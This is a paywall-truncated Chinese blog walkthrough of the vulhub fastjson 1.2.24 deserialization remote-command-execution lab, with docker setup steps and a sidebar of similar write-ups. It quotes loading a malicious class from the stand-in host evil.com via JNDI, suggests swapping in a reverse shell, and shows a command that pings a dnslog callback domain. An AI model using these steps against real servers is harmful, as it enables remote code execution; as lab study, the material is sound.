21 - vulhub - fastjson 反序列化导致任意命令执行漏洞

最新推荐文章于 2025-01-08 15:52:33 发布
原创 最新推荐文章于 2025-01-08 15:52:33 发布 · 2.4k 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#面试 #经验分享 #开发语言

本文详细介绍了如何复现fastjson的反序列化导致的任意命令执行漏洞,包括使用docker-compose启动环境,通过JNDI注入执行命令,涉及Java 8u102的漏洞环境,利用com.sun.rowset.JdbcRowSetImpl的payload,以及在本地和远程服务器上模拟RMI服务器的过程。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

2.编译并启动环境

docker-compose up -d

3.查看环境运行状态

docker ps | grep rce

在这里插入图片描述

访问 8090 端口

在这里插入图片描述

[](

)漏洞利用

首先 vulhub 给出的复现提示如下

因为目标环境是Java 8u102,没有com.sun.jndi.rmi.object.trustURLCodebase的限制,

我们可以使用com.sun.rowset.JdbcRowSetImpl的利用链,借助JNDI注入来执行命令。

首先编译并上传命令执行代码,如http://evil.com/TouchFile.class:

[](

)编译 TouchFile.class 文件

这里就利用到了我们本地的 JAVA 环境,我们需要将下面的代码编译成一个 class 文件。

将下面的代码复制到一个文件,然后使用 javac 命令进行编译.

其中的 "touch", "/tmp/success" ,可以替换成自己的反弹shell或者其他命令执行语句,比如

String[] commands = {"/bin/sh","-c",“ping user.whoami.38v2ib.dnslog.cn”};

最低0.47元/天 解锁文章

200万优质内容无限畅学
复现fastjson 1.2.24 反序列化导致任意命令执行漏洞
DXfighting_的博客
04-15 541
生成带有PHP马的class文件 把编译好的class文件传到外网系统中(这里我传到kali服务器中),并在class文件所在 的目录,Python起一个http服务。 使用marshalsec项目 启动RMI服务, 监听9999端口并加载远程类TouchFile.class: 使用burpsuite抓包后改GET包为POST包,然后在发送的请求数据包中输入以下如图payload 之后使用蚁剑连...
Fastjson 反序列化漏洞
m0_65150886的博客
10-10 1006
Fastjson在1.2.24以及之前版本存在远程代码执行高危安全漏洞Fastjson在解析json的过程中,支持使用autoType来实例化某一个具体的类,并调用该类的set/get方法来访问属性。通过查找代码中相关的方法,即可构造出一些恶意利用链Fastjson于1.2.24版本后增加了反序列化白名单,而在1.2.48以前的版本中,攻击者可以利用特殊构造的json字符串绕过白名单检测,成功执行任意命令
fastjson 1.2.24 反序列化导致任意命令执行漏洞(CVE-2017-18349)
qq_51163834的博客
06-24 1002
fastjsonjava的一个库,可以将java对象转化为json格式的字符串,也可以将json格式的字符串转化为java对象。
vulhubfastjson 1.2.24 反序列化导致任意命令执行漏洞复现
yougexiaojiuguan的博客
03-16 770
漏洞复现过程的记录
利用Vulnhub复现漏洞 - Fastjson 反序列化导致任意命令执行漏洞
JiangBuLiu的博客
07-03 9238
Fastjson 反序列化导致任意命令执行漏洞Vulnhub官方复现教程漏洞原理复现漏洞启动环境生成字节码本环境目录结构解压war漏洞复现生成字节码构造POC漏洞利用本地测试 Vulnhub官方复现教程 https://vulhub.org/#/environments/fastjson/vuln/ 漏洞原理 http://xxlegend.com/2017/04/29/title-%20fas...
Fastjson反序列化漏洞原理与漏洞复现(基于vulhub靶场)
人若无名,便可专心练剑
03-27 5658
Fastjson反序列化漏洞也是一个知名度比较高的Java反序列化漏洞,他是阿里巴巴的开源库,下面我将主要带大家了解Fastjson反序列化漏洞的原理以及相关知识点的内容,然后带师傅们去利用rmi服务去复现这个Fastjson反序列化漏洞!!!
fastjson 1.2.24 反序列化导致任意命令执行漏洞
weixin_56537388的博客
11-28 312
fastjson在解析json的过程中,支持使用autoType来实例化某一个具体的类,并调用该类的set/get方法来访问属性。通过查找代码中相关的方法,即可构造出一些恶意利用链。
Fastjson 1.2.24 反序列化导致任意命令执行漏洞
不曾扬帆,何以至远方
07-15 990
fastjson 1.2.24 反序列化
fastjson <= 1.2.80 反序列化任意代码执行漏洞
qq_18209847的博客
05-24 4743
fastjson <= 1.2.80 反序列化任意代码执行漏洞
vulhubFastjson1.2.24反序列化导致任意命令执行漏洞复现
weixin_53797419的博客
01-08 1018
fastjson在解析json的过程中,支持使用autoType来实例化某一个具体的类,并调用该类的set/get方法来访问属性。通过查找代码中相关的方法,即可构造出一些恶意利用链。
vulhub weblogic XMLDecoder 反序列化漏洞(CVE-2017-10271)
qaq517384的博客
07-06 994
影响版本 复现 启动环境 访问 python3 ws.py -t url 构造poc bp抓包发送 查看效果 构造反弹shell的poc 发送请求 成功反弹shell
(六)vulhub专栏:Apereo-cas 4.x反序列化漏洞
云舒的博客
07-20 717
cas反序列化漏洞
FastJson反序列化远程命令执行漏洞分析
moshao123的博客
03-17 932
FastJson反序列化漏洞分析 文章目录FastJson反序列化漏洞分析前言一、Fastjson的介绍二、简单使用1.引入库2.读入数据总结欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入
Fastjson反序列化漏洞
blackmagic的博客
08-09 1592
使用恶意MySQL的url作为参数创建一个com.mysql.cj.jdbc.admin.MiniAdmin对象可以通过MySQL的JDBC驱动的com.mysql.cj.jdbc.admin.MiniAdmin类创建一个指定url的JDBC连接。再通过LOAD DATA LOCAL INFILE语句读取任意文件。只要用户期望类继承自 Throwable 类,Fastjson便会将该类信任,从而造成只要是继承Throwable的任意类都可以被反序列化。生成恶意mysql文件后,
vulhub fastjson1.2.47
最新发布
03-25
Fastjson 在处理反序列化的对象时未做严格校验,允许外部输入控制类路径解析逻辑,进而导致任意代码执行风险。特别是在支持 Autotype 功能开启场景下更容易受到威胁影响[^1]。 ```java // 示例:易受攻击的代码片段...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值